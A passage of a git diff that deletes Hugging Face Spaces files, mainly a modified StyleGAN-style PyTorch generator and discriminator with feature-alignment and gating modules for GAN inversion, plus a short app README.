self.conv_clamp * gain if self.conv_clamp is not None else None - x = bias_act.bias_act(x, b, act=self.activation, gain=act_gain, clamp=act_clamp) - return x - - def extra_repr(self): - return ' '.join([ - f'in_channels={self.in_channels:d}, out_channels={self.out_channels:d}, activation={self.activation:s},', - f'up={self.up}, down={self.down}']) - -#---------------------------------------------------------------------------- - - -class MappingNetwork(torch.nn.Module): - def __init__(self, - z_dim, # Input latent (Z) dimensionality, 0 = no latent. - c_dim, # Conditioning label (C) dimensionality, 0 = no label. - w_dim, # Intermediate latent (W) dimensionality. - num_ws, # Number of intermediate latents to output, None = do not broadcast. - num_layers = 8, # Number of mapping layers. - embed_features = None, # Label embedding dimensionality, None = same as w_dim. - layer_features = None, # Number of intermediate features in the mapping layers, None = same as w_dim. - activation = 'lrelu', # Activation function: 'relu', 'lrelu', etc. - lr_multiplier = 0.01, # Learning rate multiplier for the mapping layers. - w_avg_beta = 0.998, # Decay for tracking the moving average of W during training, None = do not track. - ): - super().__init__() - self.z_dim = z_dim - self.c_dim = c_dim - self.w_dim = w_dim - self.num_ws = num_ws - self.num_layers = num_layers - self.w_avg_beta = w_avg_beta - - if embed_features is None: - embed_features = w_dim - if c_dim == 0: - embed_features = 0 - if layer_features is None: - layer_features = w_dim - features_list = [z_dim + embed_features] + [layer_features] * (num_layers - 1) + [w_dim] - - if c_dim > 0: - self.embed = FullyConnectedLayer(c_dim, embed_features) - for idx in range(num_layers): - in_features = features_list[idx] - out_features = features_list[idx + 1] - layer = FullyConnectedLayer(in_features, out_features, activation=activation, lr_multiplier=lr_multiplier) - setattr(self, f'fc{idx}', layer) - - if num_ws is not None and w_avg_beta is not None: - self.register_buffer('w_avg', torch.zeros([w_dim])) - - def forward(self, z, c, truncation_psi=1, truncation_cutoff=None, update_emas=False, repeat_w = False): - # Embed, normalize, and concat inputs. - x = None - with torch.autograd.profiler.record_function('input'): - if self.z_dim > 0: - misc.assert_shape(z, [None, self.z_dim]) - x = normalize_2nd_moment(z.to(torch.float32)) - if self.c_dim > 0: - misc.assert_shape(c, [None, self.c_dim]) - y = normalize_2nd_moment(self.embed(c.to(torch.float32))) - x = torch.cat([x, y], dim=1) if x is not None else y - - # Main layers. - for idx in range(self.num_layers): - layer = getattr(self, f'fc{idx}') - x = layer(x) - - # Update moving average of W. - if update_emas and self.w_avg_beta is not None: - with torch.autograd.profiler.record_function('update_w_avg'): - self.w_avg.copy_(x.detach().mean(dim=0).lerp(self.w_avg, self.w_avg_beta)) - - # Broadcast. - #if self.num_ws is not None: - if repeat_w: - with torch.autograd.profiler.record_function('broadcast'): - x = x.unsqueeze(1).repeat([1, self.num_ws, 1]) - - # Apply truncation. - if truncation_psi != 1: - with torch.autograd.profiler.record_function('truncate'): - assert self.w_avg_beta is not None - if self.num_ws is None or truncation_cutoff is None: - x = self.w_avg.lerp(x, truncation_psi) - else: - x[:, :truncation_cutoff] = self.w_avg.lerp(x[:, :truncation_cutoff], truncation_psi) - return x - - def extra_repr(self): - return f'z_dim={self.z_dim:d}, c_dim={self.c_dim:d}, w_dim={self.w_dim:d}, num_ws={self.num_ws:d}' - -#---------------------------------------------------------------------------- - - -class SynthesisLayer(torch.nn.Module): - def __init__(self, - in_channels, # Number of input channels. - out_channels, # Number of output channels. - w_dim, # Intermediate latent (W) dimensionality. - resolution, # Resolution of this layer. - kernel_size = 3, # Convolution kernel size. - up = 1, # Integer upsampling factor. - use_noise = True, # Enable noise input? - activation = 'lrelu', # Activation function: 'relu', 'lrelu', etc. - resample_filter = [1,3,3,1], # Low-pass filter to apply when resampling activations. - conv_clamp = None, # Clamp the output of convolution layers to +-X, None = disable clamping. - channels_last = False, # Use channels_last format for the weights? - ): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.w_dim = w_dim - self.resolution = resolution - self.up = up - self.use_noise = use_noise - self.activation = activation - self.conv_clamp = conv_clamp - self.register_buffer('resample_filter', upfirdn2d.setup_filter(resample_filter)) - self.padding = kernel_size // 2 - self.act_gain = bias_act.activation_funcs[activation].def_gain - - self.affine = FullyConnectedLayer(w_dim, in_channels, bias_init=1) - memory_format = torch.channels_last if channels_last else torch.contiguous_format - self.weight = torch.nn.Parameter(torch.randn([out_channels, in_channels, kernel_size, kernel_size]).to(memory_format=memory_format)) - if use_noise: - self.register_buffer('noise_const', torch.randn([resolution, resolution])) - self.noise_strength = torch.nn.Parameter(torch.zeros([])) - self.bias = torch.nn.Parameter(torch.zeros([out_channels])) - - def forward(self, x, w, noise_mode='random', n = None, weight_deltas = None,fused_modconv=True, gain=1): - assert noise_mode in ['random', 'const', 'none'] - in_resolution = self.resolution // self.up - misc.assert_shape(x, [None, self.in_channels, in_resolution, in_resolution]) - styles = self.affine(w) - - noise = None - if self.use_noise and noise_mode == 'random': - noise = torch.randn([x.shape[0], 1, self.resolution, self.resolution], device=x.device) * self.noise_strength - if self.use_noise and noise_mode == 'const': - if n is not None: - noise = n * self.noise_strength - else: - noise = self.noise_const * self.noise_strength - - flip_weight = (self.up == 1) # slightly faster - x = modulated_conv2d(x=x, weight=self.weight, styles=styles, noise=noise, up=self.up, - padding=self.padding, resample_filter=self.resample_filter, flip_weight=flip_weight, fused_modconv=fused_modconv, weigth_deltas=weight_deltas) - - act_gain = self.act_gain * gain - act_clamp = self.conv_clamp * gain if self.conv_clamp is not None else None - x = bias_act.bias_act(x, self.bias.to(x.dtype), act=self.activation, gain=act_gain, clamp=act_clamp) - return x - - def extra_repr(self): - return ' '.join([ - f'in_channels={self.in_channels:d}, out_channels={self.out_channels:d}, w_dim={self.w_dim:d},', - f'resolution={self.resolution:d}, up={self.up}, activation={self.activation:s}']) - -#---------------------------------------------------------------------------- - - -class ToRGBLayer(torch.nn.Module): - def __init__(self, in_channels, out_channels, w_dim, kernel_size=1, conv_clamp=None, channels_last=False): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.w_dim = w_dim - self.conv_clamp = conv_clamp - self.affine = FullyConnectedLayer(w_dim, in_channels, bias_init=1) - memory_format = torch.channels_last if channels_last else torch.contiguous_format - self.weight = torch.nn.Parameter(torch.randn([out_channels, in_channels, kernel_size, kernel_size]).to(memory_format=memory_format)) - self.bias = torch.nn.Parameter(torch.zeros([out_channels])) - self.weight_gain = 1 / np.sqrt(in_channels * (kernel_size ** 2)) - - def forward(self, x, w, fused_modconv=True): - styles = self.affine(w) * self.weight_gain - x = modulated_conv2d(x=x, weight=self.weight, styles=styles, demodulate=False, fused_modconv=fused_modconv) - x = bias_act.bias_act(x, self.bias.to(x.dtype), clamp=self.conv_clamp) - return x - - def extra_repr(self): - return f'in_channels={self.in_channels:d}, out_channels={self.out_channels:d}, w_dim={self.w_dim:d}' - -#---------------------------------------------------------------------------- -class ResLayers(nn.Module): - def __init__(self, in_channels, out_channels, stride=1): - super().__init__() - - if (in_channels == out_channels) and stride==1: - self.shortcut_layer = nn.Identity() - else: - self.shortcut_layer = nn.Sequential( - nn.Conv2d(in_channels, out_channels, (1, 1), stride, bias=False)) - - self.res_layer = nn.Sequential( - nn.Conv2d(in_channels, out_channels, (3, 3), (1, 1), 1, bias=True), nn.LeakyReLU(0.2), - nn.Conv2d(out_channels, out_channels, (3, 3), stride, 1, bias=True) ) - - def forward(self, x): - shortcut = self.shortcut_layer(x) - res = self.res_layer(x) - return res + shortcut - -class FeatureEdit(nn.Module): - def __init__(self, in_channels, out_channels): - super().__init__() - self.convs = nn.ModuleList() - iter_num = in_channels // out_channels - i_c = in_channels - for i in range(iter_num-1): - out_c = i_c - out_channels - self.convs.append( ResLayers(i_c,out_c,1) ) - i_c = out_c - def forward(self, diff): - for block in self.convs: - diff = block(diff) - return diff - -class FeatureAlignment(nn.Module): - def __init__(self, in_channels, out_channels): - super().__init__() - t_channel = 512 - self.first_layer = nn.Conv2d(in_channels, t_channel, kernel_size=1, padding=0, bias=True) - - self.conv1 = nn.Sequential(*[ResLayers(t_channel,t_channel,1)]) - self.conv2 = nn.Sequential(*[ResLayers(t_channel,t_channel,2), ResLayers(t_channel,t_channel,1)]) - self.conv3 = nn.Sequential(*[ResLayers(t_channel,t_channel,2), ResLayers(t_channel,t_channel,1)]) - - self.dconv1 = nn.Sequential(*[ResLayers(t_channel,t_channel,1), ResLayers(t_channel,t_channel,1)]) - self.dconv2 = nn.Sequential(*[ResLayers(t_channel,t_channel,1), ResLayers(t_channel,t_channel,1)]) - self.dconv3 = nn.Sequential(*[ResLayers(t_channel,t_channel,1), ResLayers(t_channel,t_channel,1)]) - - self.out_layer = nn.Conv2d(t_channel, out_channels, kernel_size=1, padding=0, bias=True) - - def forward(self, encoder_feats, generator_feats): - - x = torch.cat((encoder_feats,generator_feats), dim=1) - x = self.first_layer(x) - - f1 = self.conv1(x) - f2 = self.conv2(f1) - f3 = self.conv3(f2) - shape = f3.shape[-1] - df1 = F.interpolate(f3, size=(shape*2,shape*2) , mode='bilinear', align_corners=True) - df2 = self.dconv1(df1 + f2) - df2 = F.interpolate(df2, size=(shape*4,shape*4) , mode='bilinear', align_corners=True) - df3 = self.dconv2(df2 + f1) - - aligned_feats = self.out_layer(df3) - - return aligned_feats - -class FeatureExtraction(nn.Module): - def __init__(self,in_channels, out_channels ): - super().__init__() - t_channel = 512 - self.first_layer = nn.Conv2d(in_channels, t_channel, kernel_size=1, padding=0, bias=True) - self.convs = nn.Sequential(*[ResLayers(t_channel,t_channel,1), ResLayers(t_channel,out_channels,1), ResLayers(out_channels,out_channels,1) ]) - #self.out_layer = nn.Conv2d(t_channel, out_channels, kernel_size=1, padding=0, bias=False) - - def forward(self, aligned_feats): - #x = aligned_feats - generator_feats - y = self.first_layer(aligned_feats) - y = self.convs(y) - #deltaF = self.out_layer(x) - return y - -class GateNetwork(nn.Module): - def __init__(self, in_channels, out_channels): - super().__init__() - t_channel = 256 - self.down1 = nn.Conv2d(in_channels, t_channel, kernel_size=3, padding=1, bias=True) - self.down2 = nn.Conv2d(in_channels, t_channel, kernel_size=3, padding=1, bias=True) - self.sigmoid = nn.Sigmoid() - self.convs = nn.Sequential(*[ResLayers(in_channels,in_channels,1), ResLayers(in_channels,out_channels,1), ResLayers(out_channels,out_channels,1) ]) - self.convs2 = nn.Sequential(*[ResLayers(in_channels,in_channels,1), ResLayers(in_channels,out_channels,1), ResLayers(out_channels,1,1) ]) - - - def forward(self, generator_feats, y): - generator_feats = self.down1(generator_feats) - y = self.down2(y) - x = torch.cat((generator_feats, y), dim=1) - deltaF = self.convs(x) - gate = self.convs2(x) - gate = self.sigmoid(gate) - return deltaF, gate - -g_e_concat_shape={64: 640, 32:768} -e_shape = {64: 128, 32:256} - -class SynthesisBlock(torch.nn.Module): - def __init__(self, - in_channels, # Number of input channels, 0 = first block. - out_channels, # Number of output channels. - w_dim, # Intermediate latent (W) dimensionality. - resolution, # Resolution of this block. - img_channels, # Number of output color channels. - is_last, # Is this the last block? - architecture = 'skip', # Architecture: 'orig', 'skip', 'resnet'. - resample_filter = [1,3,3,1], # Low-pass filter to apply when resampling activations. - conv_clamp = 256, # Clamp the output of convolution layers to +-X, None = disable clamping. - use_fp16 = False, # Use FP16 for this block? - fp16_channels_last = False, # Use channels-last memory format with FP16? - fused_modconv_default = True, # Default value of fused_modconv. 'inference_only' = True for inference, False for training. - embed_res = 64, # Which resolution we embed the images - **layer_kwargs, # Arguments for SynthesisLayer. - ): - assert architecture in ['orig', 'skip', 'resnet'] - super().__init__() - self.in_channels = in_channels - self.w_dim = w_dim - self.resolution = resolution - self.img_channels = img_channels - self.is_last = is_last - self.architecture = architecture - self.use_fp16 = use_fp16 - self.channels_last = (use_fp16 and fp16_channels_last) - self.fused_modconv_default = fused_modconv_default - self.register_buffer('resample_filter', upfirdn2d.setup_filter(resample_filter)) - self.num_conv = 0 - self.num_torgb = 0 - - if in_channels == 0: - self.const = torch.nn.Parameter(torch.randn([out_channels, resolution, resolution])) - - if in_channels != 0: - self.conv0 = SynthesisLayer(in_channels, out_channels, w_dim=w_dim, resolution=resolution, up=2, - resample_filter=resample_filter, conv_clamp=conv_clamp, channels_last=self.channels_last, **layer_kwargs) - self.num_conv += 1 - - self.conv1 = SynthesisLayer(out_channels, out_channels, w_dim=w_dim, resolution=resolution, - conv_clamp=conv_clamp, channels_last=self.channels_last, **layer_kwargs) - self.num_conv += 1 - - if is_last or architecture == 'skip': - self.torgb = ToRGBLayer(out_channels, img_channels, w_dim=w_dim, - conv_clamp=conv_clamp, channels_last=self.channels_last) - self.num_torgb += 1 - - if in_channels != 0 and architecture == 'resnet': - self.skip = Conv2dLayer(in_channels, out_channels, kernel_size=1, bias=False, up=2, - resample_filter=resample_filter, channels_last=self.channels_last) - if resolution == embed_res: - in_c = g_e_concat_shape.get(embed_res) - #self.modify_feature_edit = FeatureEdit(in_channels=512, out_channels=e_shape.get(embed_res)) - self.modify_feature_alignment = FeatureAlignment(in_channels=in_c, out_channels=512) - self.modify_feature_extraction = FeatureExtraction(in_channels=512, out_channels=512) - self.modify_feature_gates = GateNetwork(in_channels=512, out_channels=512) - self.embed_res = embed_res - - def forward(self, x, img, ws, conditions=None, noise=None, weight_deltas = None, highres_outs=None, return_f = False, - force_fp32=False, fused_modconv=None, update_emas=False, **layer_kwargs): - _ = update_emas # unused - misc.assert_shape(ws, [None, self.num_conv + self.num_torgb, self.w_dim]) - w_iter = iter(ws.unbind(dim=1)) - if ws.device.type != 'cuda': - force_fp32 = True - dtype = torch.float16 if self.use_fp16 and not force_fp32 else torch.float32 - memory_format = torch.channels_last if self.channels_last and not force_fp32 else torch.contiguous_format - if fused_modconv is None: - fused_modconv = self.fused_modconv_default - if fused_modconv == 'inference_only': - fused_modconv = (not self.training) - - # Input. - if self.in_channels == 0: - x = self.const.to(dtype=dtype, memory_format=memory_format) - x = x.unsqueeze(0).repeat([ws.shape[0], 1, 1, 1]) - else: - misc.assert_shape(x, [None, self.in_channels, self.resolution // 2, self.resolution // 2]) - x = x.to(dtype=dtype, memory_format=memory_format) - gouts = {} - # Main layers. - if self.in_channels == 0: - x = self.conv1(x, next(w_iter), fused_modconv=fused_modconv, n=noise[0], weight_deltas=weight_deltas[0], **layer_kwargs) - elif self.architecture == 'resnet': - y = self.skip(x, gain=np.sqrt(0.5)) - x = self.conv0(x, next(w_iter), fused_modconv=fused_modconv, **layer_kwargs) - x = self.conv1(x, next(w_iter), fused_modconv=fused_modconv, gain=np.sqrt(0.5), **layer_kwargs) - x = y.add_(x) - else: - x = self.conv0(x, next(w_iter), fused_modconv=fused_modconv, n=noise[0], weight_deltas=weight_deltas[0], **layer_kwargs) - #HFGI Generator Modification - if x.shape[-1] == 64 and conditions is not None: - x = x*(1+conditions[0]) + conditions[1] - if x.shape[-1] == self.embed_res and return_f: - return x, None, None - #HighResFeat Generator Modification - if x.shape[-1] == self.embed_res and highres_outs is not None: - #feature_edit = self.modify_feature_edit(x - highres_outs['inversion']) - #high_res = highres_outs[f'{self.embed_res}x{self.embed_res}'] + feature_edit - aligned_feats = self.modify_feature_alignment(highres_outs[f'{self.embed_res}x{self.embed_res}'], highres_outs['inversion']) - aligned_feats = self.modify_feature_extraction(aligned_feats) - #x = self.modify_feature_gates(x, deltaF) - deltaF, gate = self.modify_feature_gates(x, aligned_feats) - x = (x * (1-gate) ) + ( (x + deltaF) * gate ) - gouts['gates'] = gate - gouts['additions'] = deltaF - gouts['aligned_feats'] = aligned_feats - - #gouts['aligned_loss'] =F.mse_loss(aligned_feats, x, reduction='mean') - x = self.conv1(x, next(w_iter), fused_modconv=fused_modconv,n=noise[1], weight_deltas=weight_deltas[1], **layer_kwargs) - - # ToRGB. - if img is not None: - misc.assert_shape(img, [None, self.img_channels, self.resolution // 2, self.resolution // 2]) - img = upfirdn2d.upsample2d(img, self.resample_filter) - if self.is_last or self.architecture == 'skip': - y = self.torgb(x, next(w_iter), fused_modconv=fused_modconv) - y = y.to(dtype=torch.float32, memory_format=torch.contiguous_format) - img = img.add_(y) if img is not None else y - - assert x.dtype == dtype - assert img is None or img.dtype == torch.float32 - return x, img, gouts - - def extra_repr(self): - return f'resolution={self.resolution:d}, architecture={self.architecture:s}' - -#---------------------------------------------------------------------------- - - -class SynthesisNetwork(torch.nn.Module): - def __init__(self, - w_dim, # Intermediate latent (W) dimensionality. - img_resolution, # Output image resolution. - img_channels, # Number of color channels. - channel_base = 32768, # Overall multiplier for the number of channels. - channel_max = 512, # Maximum number of channels in any layer. - num_fp16_res = 4, # Use FP16 for the N highest resolutions. - **block_kwargs, # Arguments for SynthesisBlock. - ): - assert img_resolution >= 4 and img_resolution & (img_resolution - 1) == 0 - super().__init__() - self.w_dim = w_dim - self.img_resolution = img_resolution - self.img_resolution_log2 = int(np.log2(img_resolution)) - self.img_channels = img_channels - self.num_fp16_res = num_fp16_res - self.block_resolutions = [2 ** i for i in range(2, self.img_resolution_log2 + 1)] - channels_dict = {res: min(channel_base // res, channel_max) for res in self.block_resolutions} - fp16_resolution = max(2 ** (self.img_resolution_log2 + 1 - num_fp16_res), 8) - - self.num_ws = 0 - for res in self.block_resolutions: - in_channels = channels_dict[res // 2] if res > 4 else 0 - out_channels = channels_dict[res] - use_fp16 = (res >= fp16_resolution) - is_last = (res == self.img_resolution) - block = SynthesisBlock(in_channels, out_channels, w_dim=w_dim, resolution=res, - img_channels=img_channels, is_last=is_last, use_fp16=use_fp16, **block_kwargs) - self.num_ws += block.num_conv - if is_last: - self.num_ws += block.num_torgb - setattr(self, f'b{res}', block) - - def forward(self, ws, conditions=None, noise=None, weight_deltas=None, highres_outs=None, return_f = False, **block_kwargs): - block_ws = [] - with torch.autograd.profiler.record_function('split_ws'): - misc.assert_shape(ws, [None, self.num_ws, self.w_dim]) - ws = ws.to(torch.float32) - w_idx = 0 - for res in self.block_resolutions: - block = getattr(self, f'b{res}') - block_ws.append(ws.narrow(1, w_idx, block.num_conv + block.num_torgb)) - w_idx += block.num_conv - - x = img = None - conv_idx = 0 - gouts = {} - for res, cur_ws in zip(self.block_resolutions, block_ws): - block = getattr(self, f'b{res}') - if noise is not None: - noise_input = noise[conv_idx: conv_idx + block.num_conv] - else: - noise_input = [None] * block.num_conv - if weight_deltas is not None: - delta_input = weight_deltas[conv_idx: conv_idx + block.num_conv] - else: - delta_input = [None] * block.num_conv - x, img, gouts_per_res = block(x, img, cur_ws, conditions, noise_input, delta_input, highres_outs, return_f, **block_kwargs) - if return_f and img is None: - return x, None - if gouts_per_res: - gouts.update(gouts_per_res) - - conv_idx += block.num_conv - return img, gouts - - def extra_repr(self): - return ' '.join([ - f'w_dim={self.w_dim:d}, num_ws={self.num_ws:d},', - f'img_resolution={self.img_resolution:d}, img_channels={self.img_channels:d},', - f'num_fp16_res={self.num_fp16_res:d}']) - -#---------------------------------------------------------------------------- - - -class Generator(torch.nn.Module): - def __init__(self, - z_dim, # Input latent (Z) dimensionality. - c_dim, # Conditioning label (C) dimensionality. - w_dim, # Intermediate latent (W) dimensionality. - resolution, # Output resolution. - img_channels, # Number of output color channels. - mapping_kwargs = {}, # Arguments for MappingNetwork. - **synthesis_kwargs, # Arguments for SynthesisNetwork. - ): - super().__init__() - self.z_dim = z_dim - self.c_dim = c_dim - self.w_dim = w_dim - self.resolution = resolution - self.img_channels = img_channels - self.synthesis = SynthesisNetwork(w_dim=w_dim, img_resolution=resolution, img_channels=img_channels, **synthesis_kwargs) - self.num_ws = self.synthesis.num_ws - self.mapping = MappingNetwork(z_dim=z_dim, c_dim=c_dim, w_dim=w_dim, num_ws=self.num_ws, **mapping_kwargs) - - # self.freeze_non_trainable_layers() - - def forward(self, lat, c, truncation_psi=1, truncation_cutoff=None, update_emas=False, mode='synthesis', return_f = False, **synthesis_kwargs): - # self.freeze_non_trainable_layers() - if mode == 'mapping': - ws = self.mapping(lat, c, truncation_psi=truncation_psi, truncation_cutoff=truncation_cutoff, update_emas=update_emas) - return ws - if mode == 'synthesis': - img = self.synthesis(lat, highres_outs = c, return_f=return_f, update_emas=False, **synthesis_kwargs) - return img - - # def freeze_non_trainable_layers(self): - # for param in self.mapping.parameters(): - # param.requires_grad = False - # for name, param in self.synthesis.named_parameters(): - # if 'modify' not in name: - # param.requires_grad = False - -#---------------------------------------------------------------------------- - - -class DiscriminatorBlock(torch.nn.Module): - def __init__(self, - in_channels, # Number of input channels, 0 = first block. - tmp_channels, # Number of intermediate channels. - out_channels, # Number of output channels. - resolution, # Resolution of this block. - img_channels, # Number of input color channels. - first_layer_idx, # Index of the first layer. - architecture = 'resnet', # Architecture: 'orig', 'skip', 'resnet'. - activation = 'lrelu', # Activation function: 'relu', 'lrelu', etc. - resample_filter = [1,3,3,1], # Low-pass filter to apply when resampling activations. - conv_clamp = None, # Clamp the output of convolution layers to +-X, None = disable clamping. - use_fp16 = False, # Use FP16 for this block? - fp16_channels_last = False, # Use channels-last memory format with FP16? - freeze_layers = 0, # Freeze-D: Number of layers to freeze. - ): - assert in_channels in [0, tmp_channels] - assert architecture in ['orig', 'skip', 'resnet'] - super().__init__() - self.in_channels = in_channels - self.resolution = resolution - self.img_channels = img_channels - self.first_layer_idx = first_layer_idx - self.architecture = architecture - self.use_fp16 = use_fp16 - self.channels_last = (use_fp16 and fp16_channels_last) - self.register_buffer('resample_filter', upfirdn2d.setup_filter(resample_filter)) - - self.num_layers = 0 - def trainable_gen(): - while True: - layer_idx = self.first_layer_idx + self.num_layers - trainable = (layer_idx >= freeze_layers) - self.num_layers += 1 - yield trainable - trainable_iter = trainable_gen() - - if in_channels == 0 or architecture == 'skip': - self.fromrgb = Conv2dLayer(img_channels, tmp_channels, kernel_size=1, activation=activation, - trainable=next(trainable_iter), conv_clamp=conv_clamp, channels_last=self.channels_last) - - self.conv0 = Conv2dLayer(tmp_channels, tmp_channels, kernel_size=3, activation=activation, - trainable=next(trainable_iter), conv_clamp=conv_clamp, channels_last=self.channels_last) - - self.conv1 = Conv2dLayer(tmp_channels, out_channels, kernel_size=3, activation=activation, down=2, - trainable=next(trainable_iter), resample_filter=resample_filter, conv_clamp=conv_clamp, channels_last=self.channels_last) - - if architecture == 'resnet': - self.skip = Conv2dLayer(tmp_channels, out_channels, kernel_size=1, bias=False, down=2, - trainable=next(trainable_iter), resample_filter=resample_filter, channels_last=self.channels_last) - - def forward(self, x, img, force_fp32=False): - if (x if x is not None else img).device.type != 'cuda': - force_fp32 = True - dtype = torch.float16 if self.use_fp16 and not force_fp32 else torch.float32 - memory_format = torch.channels_last if self.channels_last and not force_fp32 else torch.contiguous_format - - # Input. - if x is not None: - misc.assert_shape(x, [None, self.in_channels, self.resolution, self.resolution]) - x = x.to(dtype=dtype, memory_format=memory_format) - - # FromRGB. - if self.in_channels == 0 or self.architecture == 'skip': - misc.assert_shape(img, [None, self.img_channels, self.resolution, self.resolution]) - img = img.to(dtype=dtype, memory_format=memory_format) - y = self.fromrgb(img) - x = x + y if x is not None else y - img = upfirdn2d.downsample2d(img, self.resample_filter) if self.architecture == 'skip' else None - - # Main layers. - if self.architecture == 'resnet': - y = self.skip(x, gain=np.sqrt(0.5)) - x = self.conv0(x) - x = self.conv1(x, gain=np.sqrt(0.5)) - x = y.add_(x) - else: - x = self.conv0(x) - x = self.conv1(x) - - assert x.dtype == dtype - return x, img - - def extra_repr(self): - return f'resolution={self.resolution:d}, architecture={self.architecture:s}' - -#---------------------------------------------------------------------------- - - -class MinibatchStdLayer(torch.nn.Module): - def __init__(self, group_size, num_channels=1): - super().__init__() - self.group_size = group_size - self.num_channels = num_channels - - def forward(self, x): - N, C, H, W = x.shape - with misc.suppress_tracer_warnings(): # as_tensor results are registered as constants - G = torch.min(torch.as_tensor(self.group_size), torch.as_tensor(N)) if self.group_size is not None else N - F = self.num_channels - c = C // F - - y = x.reshape(G, -1, F, c, H, W) # [GnFcHW] Split minibatch N into n groups of size G, and channels C into F groups of size c. - y = y - y.mean(dim=0) # [GnFcHW] Subtract mean over group. - y = y.square().mean(dim=0) # [nFcHW] Calc variance over group. - y = (y + 1e-8).sqrt() # [nFcHW] Calc stddev over group. - y = y.mean(dim=[2,3,4]) # [nF] Take average over channels and pixels. - y = y.reshape(-1, F, 1, 1) # [nF11] Add missing dimensions. - y = y.repeat(G, 1, H, W) # [NFHW] Replicate over group and pixels. - x = torch.cat([x, y], dim=1) # [NCHW] Append to input as new channels. - return x - - def extra_repr(self): - return f'group_size={self.group_size}, num_channels={self.num_channels:d}' - -#---------------------------------------------------------------------------- - - -class DiscriminatorEpilogue(torch.nn.Module): - def __init__(self, - in_channels, # Number of input channels. - cmap_dim, # Dimensionality of mapped conditioning label, 0 = no label. - resolution, # Resolution of this block. - img_channels, # Number of input color channels. - architecture = 'resnet', # Architecture: 'orig', 'skip', 'resnet'. - mbstd_group_size = 4, # Group size for the minibatch standard deviation layer, None = entire minibatch. - mbstd_num_channels = 1, # Number of features for the minibatch standard deviation layer, 0 = disable. - activation = 'lrelu', # Activation function: 'relu', 'lrelu', etc. - conv_clamp = None, # Clamp the output of convolution layers to +-X, None = disable clamping. - ): - assert architecture in ['orig', 'skip', 'resnet'] - super().__init__() - self.in_channels = in_channels - self.cmap_dim = cmap_dim - self.resolution = resolution - self.img_channels = img_channels - self.architecture = architecture - - if architecture == 'skip': - self.fromrgb = Conv2dLayer(img_channels, in_channels, kernel_size=1, activation=activation) - self.mbstd = MinibatchStdLayer(group_size=mbstd_group_size, num_channels=mbstd_num_channels) if mbstd_num_channels > 0 else None - self.conv = Conv2dLayer(in_channels + mbstd_num_channels, in_channels, kernel_size=3, activation=activation, conv_clamp=conv_clamp) - self.fc = FullyConnectedLayer(in_channels * (resolution ** 2), in_channels, activation=activation) - self.out = FullyConnectedLayer(in_channels, 1 if cmap_dim == 0 else cmap_dim) - - def forward(self, x, img, cmap, force_fp32=False): - misc.assert_shape(x, [None, self.in_channels, self.resolution, self.resolution]) # [NCHW] - _ = force_fp32 # unused - dtype = torch.float32 - memory_format = torch.contiguous_format - - # FromRGB. - x = x.to(dtype=dtype, memory_format=memory_format) - if self.architecture == 'skip': - misc.assert_shape(img, [None, self.img_channels, self.resolution, self.resolution]) - img = img.to(dtype=dtype, memory_format=memory_format) - x = x + self.fromrgb(img) - - # Main layers. - if self.mbstd is not None: - x = self.mbstd(x) - x = self.conv(x) - x = self.fc(x.flatten(1)) - x = self.out(x) - - # Conditioning. - if self.cmap_dim > 0: - misc.assert_shape(cmap, [None, self.cmap_dim]) - x = (x * cmap).sum(dim=1, keepdim=True) * (1 / np.sqrt(self.cmap_dim)) - - assert x.dtype == dtype - return x - - def extra_repr(self): - return f'resolution={self.resolution:d}, architecture={self.architecture:s}' - -#---------------------------------------------------------------------------- - - -class Discriminator(torch.nn.Module): - def __init__(self, - c_dim, # Conditioning label (C) dimensionality. - img_resolution, # Input resolution. - img_channels, # Number of input color channels. - architecture = 'resnet', # Architecture: 'orig', 'skip', 'resnet'. - channel_base = 32768, # Overall multiplier for the number of channels. - channel_max = 512, # Maximum number of channels in any layer. - num_fp16_res = 4, # Use FP16 for the N highest resolutions. - conv_clamp = 256, # Clamp the output of convolution layers to +-X, None = disable clamping. - cmap_dim = None, # Dimensionality of mapped conditioning label, None = default. - block_kwargs = {}, # Arguments for DiscriminatorBlock. - mapping_kwargs = {}, # Arguments for MappingNetwork. - epilogue_kwargs = {}, # Arguments for DiscriminatorEpilogue. - ): - super().__init__() - self.c_dim = c_dim - self.img_resolution = img_resolution - self.img_resolution_log2 = int(np.log2(img_resolution)) - self.img_channels = img_channels - self.block_resolutions = [2 ** i for i in range(self.img_resolution_log2, 2, -1)] - channels_dict = {res: min(channel_base // res, channel_max) for res in self.block_resolutions + [4]} - fp16_resolution = max(2 ** (self.img_resolution_log2 + 1 - num_fp16_res), 8) - - if cmap_dim is None: - cmap_dim = channels_dict[4] - if c_dim == 0: - cmap_dim = 0 - - common_kwargs = dict(img_channels=img_channels, architecture=architecture, conv_clamp=conv_clamp) - cur_layer_idx = 0 - for res in self.block_resolutions: - in_channels = channels_dict[res] if res < img_resolution else 0 - tmp_channels = channels_dict[res] - out_channels = channels_dict[res // 2] - use_fp16 = (res >= fp16_resolution) - block = DiscriminatorBlock(in_channels, tmp_channels, out_channels, resolution=res, - first_layer_idx=cur_layer_idx, use_fp16=use_fp16, **block_kwargs, **common_kwargs) - setattr(self, f'b{res}', block) - cur_layer_idx += block.num_layers - if c_dim > 0: - self.mapping = MappingNetwork(z_dim=0, c_dim=c_dim, w_dim=cmap_dim, num_ws=None, w_avg_beta=None, **mapping_kwargs) - self.b4 = DiscriminatorEpilogue(channels_dict[4], cmap_dim=cmap_dim, resolution=4, **epilogue_kwargs, **common_kwargs) - - def forward(self, img, c, update_emas=False, **block_kwargs): - _ = update_emas # unused - x = None - for res in self.block_resolutions: - block = getattr(self, f'b{res}') - x, img = block(x, img, **block_kwargs) - - cmap = None - if self.c_dim > 0: - cmap = self.mapping(None, c) - x = self.b4(x, img, cmap) - return x - - def extra_repr(self): - return f'c_dim={self.c_dim:d}, img_resolution={self.img_resolution:d}, img_channels={self.img_channels:d}' - -#---------------------------------------------------------------------------- diff --git a/spaces/hangjoni/food_classifier/README.md b/spaces/hangjoni/food_classifier/README.md deleted file mode 100644 index bfa8d6d0428de04ee05fb1a51d5ee9d4cba4ab97..0000000000000000000000000000000000000000 --- a/spaces/hangjoni/food_classifier/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Food Classifier -emoji: 📈 -colorFrom: green -colorTo: yellow -sdk: streamlit -sdk_version: 1.10.0 -app_file: app.py -pinned: false -license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/harpreetsahota/RAQA-Application-Chainlit-Demo/chainlit.md b/spaces/harpreetsahota/RAQA-Application-Chainlit-Demo/chainlit.md deleted file mode 